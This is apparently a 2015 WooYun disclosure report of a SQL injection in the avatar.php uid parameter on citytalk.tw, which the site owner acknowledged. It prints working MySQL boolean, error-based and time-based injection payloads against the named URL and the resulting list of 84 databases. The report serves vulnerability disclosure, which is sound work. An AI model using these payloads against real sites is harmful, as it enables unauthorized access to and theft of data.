当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123939

漏洞标题:中國台灣citytalk城市通SQL注射影響80個庫

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-07-01 18:50

修复时间:2015-08-17 11:30

公开时间:2015-08-17 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-03: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向核心白帽子及相关领域专家公开
2015-07-23: 细节向普通白帽子公开
2015-08-02: 细节向实习白帽子公开
2015-08-17: 细节向公众公开

简要描述:

sql inject.

详细说明:

www.citytalk.tw/bbs/uc_server/avatar.php?size=small&uid='

漏洞证明:

---
Parameter: uid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: size=small&uid=1' RLIKE (SELECT (CASE WHEN (8269=8269) THEN 1 ELSE 0x28 END)) AND 'AuES'='AuES
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: size=small&uid=1' AND (SELECT 1078 FROM(SELECT COUNT(*),CONCAT(0x7170786a71,(SELECT (ELT(1078=1078,1))),0x7171627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LOiw'='LOiw
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: size=small&uid=1' OR SLEEP(5) AND 'owgl'='owgl
---
back-end DBMS: MySQL >= 5.0.0
current user: 'root@%'
current user is DBA: False
available databases [84]:
[*] bazhua
[*] citytalk_addoil_wall
[*] citytalk_blog
[*] citytalk_fl_banner_statistic
[*] citytalk_godbird
[*] citytalk_openx
[*] citytalk_sharecount
[*] citytalk_sns
[*] citytalk_sns_lab
[*] citytalk_talk
[*] citytalk_tasktool
[*] ct_2011springwave
[*] ct_2ndAnniversary
[*] ct_311prayjapan
[*] ct_adm_cms
[*] ct_almanac2011
[*] ct_anythinggoes
[*] ct_beyourownhero
[*] ct_chagall
[*] ct_classicart
[*] ct_ctemotion
[*] ct_ctgame01
[*] ct_ctgame_hero
[*] ct_dinosaursdreampark
[*] ct_dunhuangart
[*] ct_email
[*] ct_event
[*] ct_fairycastle
[*] ct_food
[*] ct_forevercrazy
[*] ct_funcare
[*] ct_fww
[*] ct_gauguin
[*] ct_gegege
[*] ct_goldenhorse
[*] ct_googleplus
[*] ct_hlaf
[*] ct_jamesbluntandlinkinpark
[*] ct_laddaland
[*] ct_love3image
[*] ct_love_bubble
[*] ct_makeyourbaby
[*] ct_maple
[*] ct_maryandmax
[*] ct_mummy
[*] ct_newyear
[*] ct_plurkfestival3rd
[*] ct_qing
[*] ct_ripstevejobs
[*] ct_river
[*] ct_satellite_shareanytime
[*] ct_sevent
[*] ct_showyourticket
[*] ct_silkroad
[*] ct_slotmach
[*] ct_slotmachine
[*] ct_soeasyedu
[*] ct_spec68
[*] ct_stream_manage
[*] ct_subscribe
[*] ct_tangspa
[*] ct_tarot
[*] ct_tezuka
[*] ct_thismeanswar
[*] ct_trickortreat
[*] ct_valentine2012
[*] ct_whatsyournumber
[*] ct_widget
[*] ct_wordpress
[*] ct_wrestling
[*] ct_xmenfirstclass
[*] drupal_atrium
[*] ecshop
[*] ecshop_infocollect
[*] fb_ctevent
[*] fb_easyiframe
[*] information_schema
[*] innodb
[*] mysql
[*] newyear
[*] performance_schema
[*] survey
[*] tmp
[*] twlike

修复方案:

很大的數據量。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-03 11:30

厂商回复:

感謝通報!!

最新状态:

暂无